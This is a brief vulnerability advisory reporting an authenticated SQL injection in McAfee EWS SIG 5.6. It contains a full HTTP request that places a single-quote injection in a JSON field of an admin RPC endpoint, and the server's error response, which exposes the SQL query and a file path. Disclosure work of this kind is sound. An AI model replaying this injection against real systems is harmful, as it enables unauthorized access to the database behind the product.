McAfee EWS SIG 5.6 1741.115 - Authenticated SQL injection

Vulnerability Title: SQL injection - Authenticated

Vulnerable System:

  • McAfee EWS SIG 5.6 1741.115

Description:

The application is vulnerable to SQL injection.

Exploit:

Request:

POST /scmadmin/29836/cgi-bin/rpc/getMSRecipients/118 HTTP/1.1
Host: 10.10.10.113
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: text/plain; charset=UTF-8
Referer: https://10.10.10.113/scmadmin/29836/en_US/html/index.html
Content-Length: 35
Cookie: SCMUserSettings=%3Dnull%26popcheck%3D1%26lastUser%3Dscmadmin%26lang%3Den_US%26last_page_id%3Dmessage_search; SHOW_BANNER_NOTICE=BannerShown%3D1; ws_session=SID%3DSID%3AD911311E-E496-4807-800C-0790A40AF080
Pragma: no-cache
Cache-Control: no-cache

{"start":"O'","limit":15,"offset":0}

Response:

HTTP/1.1 200 OK
Date: Fri, 14 Dec 2012 01:25:16 GMT
Server: Apache/2.0.63 (Unix)
Vary: Accept-Encoding
Content-Length: 238
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=utf-8

[{"errorDesc":"ERROR:  unterminated quoted string at or near \"' group by lower(encodedaddr) order by lower(encodedaddr) limit 15\" at /opt/NETAwss/ui/www/scmadmin/cgi-bin/rpc line 701\n","errorCode":"1","errorContext":{},"jobId":"118"}]

Impact: Impact is low, due to the fact that they need valid credentials to be exploited.

Recommendation:

No response from MCAfee to the submission.

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.